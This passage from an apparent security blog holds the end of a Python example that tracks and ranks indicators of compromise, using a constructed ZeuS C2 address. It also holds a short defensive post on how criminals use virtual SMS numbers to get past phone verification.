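        """Archived IOCs stay searchable but carry little weight in detection."""
        return 1.0 if self.state in ("active", "enriched") else 0.1


def lookup(iocs, observed: str) -> list:
    """Match an observed value; archived hits are returned too, ranked behind
    live ones, so an analyst still sees the history together with its context."""
    return sorted((i for i in iocs if i.value == observed),
                  key=lambda i: -i.detection_score())


if __name__ == "__main__":
    # Constructed indicator, not a real C2 address.
    c2 = IOC("198.51.100.7", "ip", "2017-01-10", "sandbox run")
    c2.enrich(malware="ZeuS", role="c2", case="IR-0042")
    print(c2.tick("2017-02-01"), c2.tick("2017-06-15"), c2.detection_score(), c2.context)
```

The point of keeping archived entries in lookup() rather than deleting them is exactly the context argument above: a hit on an archived indicator should not page anyone, but the analyst who searches for the address during an investigation still gets the family, role and case number attached to it.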

Written by xorl

November 28, 2017 at 21:47

Threat Analysis: Phone Verification Bypassing


Here I will walk you through a common cyber-crime technique: bypassing phone verification services. As an additional security and verification control, many companies (Google, for example) require some sort of phone verification to activate an account. No cyber-criminal wants to do that with a real number, since the newly created account is likely to be used for malicious activity.

As you can see from the above, the common practice in cyber-crime circles is to use online SMS services, usually referred to as "virtual phones". During my investigations I have identified a few different ways cyber-criminals use those services, briefly listed below.

  • Verification of new accounts (for phishing, fraud, etc.)
  • SMS verification for fraudulent payment transactions
  • Verification during fraudulent issuing of official documents

This is not very easy to track from a blue team perspective, but it is not impossible. If you are suffering from fraudulent activity while enforcing some sort of phone verification, this might be the reason. You should probably start investing in detecting software-based phones as well as numbers belonging to the common providers of "virtual phones".

Written by xorl

November 27, 2017 at 20:52